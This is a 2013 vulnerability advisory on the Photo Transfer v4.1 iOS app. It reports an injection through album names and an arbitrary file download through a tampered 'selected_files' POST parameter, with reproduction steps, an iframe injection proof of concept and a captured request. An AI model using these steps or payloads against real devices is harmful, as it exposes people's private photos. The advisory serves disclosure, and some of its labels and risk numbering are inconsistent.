Document Title:
===============
Photo Transfer v4.1 iOS - Multiple Web Vulnerabilities


Date:
=====
2013-04-23


References:
===========
http://www.vulnerability-lab.com/get_content.php?id=933


VL-ID:
=====
933


Common Vulnerability Scoring System:
====================================
6


Introduction:
=============
Photo Transfer is the easiest way to transfer photos and videos to and from your iPhone, iPad, iPad mini and iTouch.
This App not only lets you download photos or videos to your computer easily from your iPhone or iPad but also but 
also exchange photos from your other device to your iPad, iPhone or iPod touch. No USB or extra software is needed.

- Easy - Easily download multiple photos from your iPad, iPhone or iPod touch to your computer (Windows and Mac)
- Useful - Exchange photos and videos between multiple iPhone, iPad or iTouch devices
- Convenient - Select up to multiple photos or videos to transfer at one time and transfer them from Device to Computer or Device to Device
- Original - Transfer photos & videos in full resolution, photos are not reduced in quality as with other apps
- Shortcut - Transfer photos between devices over Wifi
- Modern - No USB or extra software required
- Widely - Works with computers running Windows, Mac and Linux
- Safe - Your photos and videos are transferred directly from device to device using your local wifi network. 
They are not stored in an external server and they never leave your local wifi network
- Economical - Pay only ONCE to install this app on your iPhone and iPad (as long as the same iTunes account is used on both devices)

* Upload photos and videos from your computer to your iPad, iPhone or iPod touch - Photos are saved to the Saved photos album 
* To transfer photos from one iPhone/iPad to another both devices needn`t to have this app installed. You can only use device s 
browser download or upload media. 
* Access to a properly configured wifi network is required for this application to work. Some public or private wifi networks 
may be configured to block communication between devices preventing the transfer connection to be established


(Copy of the Homepage: https://itunes.apple.com/de/app/photo-transfer-lite-wifi/id606113043 )


Abstract:
=========
The Vulnerability Laboratory Research Team discovered multiple vulnerabilities in the mobile Wifi Photo Transfer 2.1 & 1.1 Pro app for the apple ipad & iphone.


Report-Timeline:
================
2013-04-24:	Public Disclosure


Status:
========
Published


Affected Products:
==================
Apple AppStore
Product: Photo Transfer iOS v4.1


Exploitation-Technique:
=======================
Remote


Severity:
=========
High


Details:
========
1.1
A local command injection web vulnerability is detected in the mobile Photo Transfer v4.1 app for the apple ipad & iphone. 
The vulnerability allows to inject local commands via vulnerable system values to compromise the apple mobile iOS application.

The vulnerability is located in the index module when processing to load the ipad or iphone device album folder names. 
Local attackers can change the ipad or iphone device photo album names to system specific commands and file requests to provoke 
the execution when processing to watch the main index album listing. The execution of the script code occurs in the album name 
web context when processing to display the vulnerable name value.

Exploitation of the web vulnerability does not require a privileged application user account (standard) or user interaction.
Successful exploitation of the vulnerability results unauthorized execution of system specific commands and path requests.


Vulnerable Application(s):
				[+] Photo Transfer v4.1 - ITunes or AppStore (Apple)

Vulnerable Parameter(s):
				[+] path/folder name

Affected Module(s):
				[+] Index Listing - Album



1.2
An arbitrary file download vulnerability is detected in the mobile Photo Transfer v4.1 app for the apple ipad & iphone.
The vulnerability allows remote attackers to download via manipulated POST method unauthorized remote files on the affected web-server file system.

The vulnerability is located in the `ibatchdownload` module. Remote attackers can unauthorized download files via POST request method when 
processing to load manipulated `selected_files` values. Remote attackers are able to change the selected file names of the POSt request to 
own file names to unauthorized capture pictures by downloading.

Exploitation of the local arbitrary file download vulnerability does not require user interaction and also no privileged user account. 
Successful exploitation of the app vulnerability results in information disclosure and unauthorized web-server photo file access/downloads.

Vulnerable Application(s):
				[+] Photo Transfer v4.1 - ITunes or AppStore (Apple)

Vulnerable Module(s):
				[+] ibatchdownload

Vulnerable Parameter(s):
				[+] selected_files


Proof of Concept:
=================
1.1
The local command injection web vulnerability can be exploited by remote attackers without privileged application user account 
and without user interaction. For demonstration or reproduce ...

Manually steps to reproduce ... Command Inject via Album Foldername

1. Install the application from itunes or directly from the appstore
2. Open the service and make the webserver available via http
3. Now open for example your iphone or ipad device to sync
4. Open on your device (iphone or ipad) the standard albums in photos
5. Change the name of one of your standard album to a path command inject string
6. Open another device and access the index listing of the application after the album sync
7. The code will be executed from the main album `name` listing context
8. Successful reproduced ...!


PoC: Wifi Album  Easy Photo Transfer Tools
     
<span class="name">>%20>"<iframe src="Wifi%20Album%20%20Easy%20Photo%20Transfer%20Tools_files/a.htm">
  <><>>%20>"<iframe 
src=http://www.vulnerability-lab.com></span></div><div
 class="info_col"><span class="f_left gray">12 
Files</span></div></div></div></iframe></span>



1.2
The local file web vulnerability can be exploited by remote attackers without privileged application user account 
and without user interaction. For demonstration or reproduce ...

Manually steps to reproduce ... File Include Vulnerability

1.  Start your session tamper tool or wireshark on your computer
2.  Install the application on the ipad or iphone device
3.  Start to tamper the http session or filter the http pakets via wireshark
4.  Start the application on your ipad or iphone and start the webserver
5.  Open with a external device (computer > browser) the application
6.  Now process to download all and hold a request via tamper or record the paket for a second request
7.  Include atfer choosing a random restricted image own values and handle the same request again with the exchanged values
8.  The server is compressing all manipulated non selected images to a a compressed images.zip folder for download
9.  The remote attacker downloads the folder and extract the pictures which was unauthorized included by the batchdownloader

--- REQUEST & POST METHOD ---
12:38:17.408[31919ms][total 31919ms] 
Status: 200[OK]

POST http://localhost:8080/i/batchdownload/images.zip 
Load Flags[LOAD_DOCUMENT_URI  LOAD_INITIAL_DOCUMENT_URI  ] 
Content Size[107472854] Mime Type[application/x-unknown-content-type]
   

Request Headers:
      
Host[192.168.2.104:8080]
      User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:20.0) Gecko/20100101 Firefox/20.0]
      
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      
Accept-Language[en-US,en;q=0.5]
      
Accept-Encoding[gzip, deflate]
      
DNT[1]
      

Referer[http://localhost:8080/i/album/2/0/30]
      
Connection[keep-alive]
   

Post Data:
selected_files[IMG_13373117.JPG%2CIMG_[ARBITRARY FILE DOWNLOAD VULNERABILITY!].JPG%2CIMG_0245.JPG%2CIMG_0244.JPG%2C
IMG_0243.JPG%2CIMG_0242.JPG%2CIMG_0241.JPG%2CIMG_0240.JPG%2CIMG_0239.JPG%2CIMG_0238.JPG%2CIMG_0237.JPG%2CIMG_0236.JPG
%2CIMG_0235.JPG%2CIMG_0234.JPG%2CIMG_0233.JPG%2CIMG_0232.JPG%2CIMG_0231.JPG%2CIMG_0230.JPG%2CIMG_0229.JPG%2CIMG_0228.JPG
%2CIMG_0227.JPG%2CIMG_0226.JPG%2CIMG_0183.PNG%2CIMG_0182.PNG%2CIMG_0181.PNG%2CIMG_0179.PNG%2CIMG_0174.PNG
%2CIMG_0173.PNG%2CIMG_0172.PNG%2CIMG_0171.PNG%2C]
      
selected_size[1]

Response Headers:
      Accept-Ranges[bytes]
      Content-Length[107472854]
      Date[Thu, 18 Apr 2013 10:40:21 GMT]



Reference(s):
http://localhost:8080/i/album/2/0/30   (Download All *.zip)


Risk:
=====
1.1
The security risk of the file include / arbitrary file dowload vulnerability is estimated as high(+).

1.2
The security risk of the local command injection web vulnerability is estimated as high(-).



Credits:
========
Vulnerability Laboratory [Research Team]  -    Benjamin Kunz Mejri (bkm@vulnerability-lab.com)


Disclaimer:
===========
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation 
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases 
or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com   	- www.vuln-lab.com			       - www.vulnerability-lab.com/register
Contact:    admin@vulnerability-lab.com 	- support@vulnerability-lab.com 	       - research@vulnerability-lab.com
Section:    video.vulnerability-lab.com 	- forum.vulnerability-lab.com 		       - news.vulnerability-lab.com
Social:	    twitter.com/#!/vuln_lab 		- facebook.com/VulnerabilityLab 	       - youtube.com/user/vulnerability0lab
Feeds:	    vulnerability-lab.com/rss/rss.php	- vulnerability-lab.com/rss/rss_upcoming.php   - vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other 
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and 
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), 
modify, use or edit our material contact (admin@vulnerability-lab.com or support@vulnerability-lab.com) to get a permission.

    				   	Copyright © 2013 | Vulnerability Laboratory